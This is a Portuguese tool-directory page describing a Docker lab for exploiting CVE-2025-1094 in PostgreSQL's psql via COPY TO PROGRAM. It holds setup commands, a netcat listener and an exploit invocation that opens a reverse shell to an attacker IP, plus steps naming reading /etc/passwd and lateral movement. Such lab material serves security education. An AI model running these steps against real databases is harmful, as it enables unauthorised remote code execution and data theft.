Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-1094-Lab-Setup — Laboratório prático para explorar a CVE-2025-1094, uma injeção de SQL no psql do PostgreSQL que leva a RCE via COPY TO PROGRAM, com configuração em Docker e payload de reverse shell. | Kitploit
Ferramentas/GitHubGitHub/pinkarmor/cve-2025-1094-lab-setup
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubpinkarmor/cve-2025-1094-lab-setup

CVE-2025-1094-Lab-Setup

Laboratório prático para explorar a CVE-2025-1094, uma injeção de SQL no psql do PostgreSQL que leva a RCE via COPY TO PROGRAM, com configuração em Docker e payload de reverse shell.

Ver Repositório
há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛠️ Configuração do Laboratório CVE-2025-1094

⚠️ Aviso
Este laboratório é apenas para fins educacionais e de pesquisa.
NÃO utilize qualquer informação ou técnica demonstrada aqui em sistemas que você não possua ou para os quais não tenha permissão explícita para testar. O uso não autorizado desses métodos pode violar leis e resultar em penalidades severas.


📌 Visão Geral

CVE-2025-1094 é uma vulnerabilidade crítica que afeta a ferramenta interativa psql do PostgreSQL, descoberta na versão 14.15 e anteriores.
Ela permite que atacantes realizem Injeção de SQL, o que pode levar à Execução Remota de Código (RCE) sob certas condições.


🧨 Causa Raiz

A vulnerabilidade surge do tratamento inadequado de entrada UTF-8 malformada no psql.
Devido à validação insuficiente, atacantes podem injetar SQL arbitrário ou meta-comandos como ! (escape de shell), e até mesmo explorar COPY ... TO PROGRAM para executar comandos do sistema.


🔥 Impacto e Cenários de Ataque

  • Injeção de SQL → RCE: Strings UTF-8 malformadas contornam a validação e levam à execução arbitrária de consultas.
  • Abuso do COPY TO PROGRAM: Atacantes podem executar comandos de shell arbitrários, como:
    • Reverse shells
    • Leitura de arquivos sensíveis (/etc/passwd)
    • Combinação com outras CVEs para RCE total sem autenticação
  • Risco de Integração: Software que usa psql com entrada não confiável (ex.: BeyondTrust PRA, Remote Support) está particularmente exposto.

🧪 Requisitos do Laboratório

🐳 Vítima (Ubuntu)

Instale o Docker:

root@kitploit:~
sudo apt update
sudo apt install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update
sudo apt install -y docker-ce docker-ce-cli containerd.io
sudo systemctl enable --now docker
sudo usermod -aG docker $USER

👉 Reinicie ou faça logout e login novamente para aplicar as permissões do grupo Docker.


🐍 Atacante (Kali)

Instale Python e as dependências:

root@kitploit:~
sudo apt install -y python3 python3-pip python3-psycopg2 netcat-traditional

✅ Garanta a conectividade de rede entre as máquinas do atacante e da vítima.


⚙️ Passo 1 – Implantar o Contêiner PostgreSQL Vulnerável (Vítima)

  1. Baixe a imagem PostgreSQL 14.15:
root@kitploit:~
docker pull postgres:14.15
  1. Execute o contêiner:
root@kitploit:~
docker run --name vulnerable_postgres   -e POSTGRES_USER=postgres123   -e POSTGRES_PASSWORD=StrongP@ssWord   -e POSTGRES_DB=labdb   -p 5432:5432   -d postgres:14.15
  1. Aguarde ~5s para a inicialização e, em seguida, crie uma tabela de demonstração:
root@kitploit:~
docker exec -i vulnerable_postgres psql -U postgres123 -d labdb <<EOF
CREATE TABLE users (
  id SERIAL PRIMARY KEY,
  username TEXT,
  password TEXT
);
INSERT INTO users (username, password) VALUES ('admin', 'password123');
EOF

✅ Passo 1.5 – Verificar o contêiner e a configuração do banco de dados

Após iniciar o contêiner, verifique se tudo está funcionando com os seguintes comandos:

1. Verifique se o contêiner PostgreSQL está em execução:

root@kitploit:~
sudo docker ps

📌 Você deve ver um contêiner chamado vulnerable_postgres escutando na porta 5432.


2. Acesse o contêiner e inspecione o banco de dados:

root@kitploit:~
sudo docker exec -it vulnerable_postgres psql -U postgres123 -d labdb

Dentro do shell do psql, execute:

root@kitploit:~
SELECT * FROM users;

Saída esperada:

root@kitploit:~
 id | username |  password
----+----------+-------------
  1 | admin    | password123
(1 row)

Saia do psql:

root@kitploit:~
\q

✅ Agora sua instância PostgreSQL vulnerável está em execução e pronta para exploração.


3. Ligue o contêiner novamente

root@kitploit:~
sudo docker start vulnerable_postgres

📡 Passo 2 – Explorar a partir da Máquina do Atacante

  1. Inicie um listener na máquina do atacante para capturar o reverse shell:
root@kitploit:~
nc -lvnp 4444
  1. Execute o script de exploração (ajuste IP e porta se necessário):
root@kitploit:~
python3 exploit.py <Victim_IP> <Attacker_IP> <Attacker_PORT>
  1. Se for bem-sucedido, você receberá um reverse shell do contêiner PostgreSQL vulnerável 🎉
root@kitploit:~
[*] Connecting to PostgreSQL server...
[+] Connected successfully!
[*] Sending payload...
[✓] Payload executed! Check your Netcat listener for a shell.

🧰 Fluxo de Exploração de Exemplo

  1. Injete UTF-8 malformado para contornar a validação de entrada
  2. Explore o COPY ... TO PROGRAM para executar comandos de shell arbitrários
  3. O reverse shell conecta de volta à máquina do atacante
  4. Escale privilégios ou mova-se lateralmente dentro do ambiente

💡 Dica: Você pode criar um snapshot deste contêiner vulnerável e reutilizá-lo posteriormente sem reconstruir o ambiente.

Baixar ferramenta